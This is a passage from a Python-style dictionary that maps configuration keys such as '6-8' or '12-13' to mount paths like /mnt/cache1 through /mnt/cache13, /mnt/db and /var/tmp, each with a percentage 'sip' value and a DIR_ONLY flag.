'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'6-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'1-6': {'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '80', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'6-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'9-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'9-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'5-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'0-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'4-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'8-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'8-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'8-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'8-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'8-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'8-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'9-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'6-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'6-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'2-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'2-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'2-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'2-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'2-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'2-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'2-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'2-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
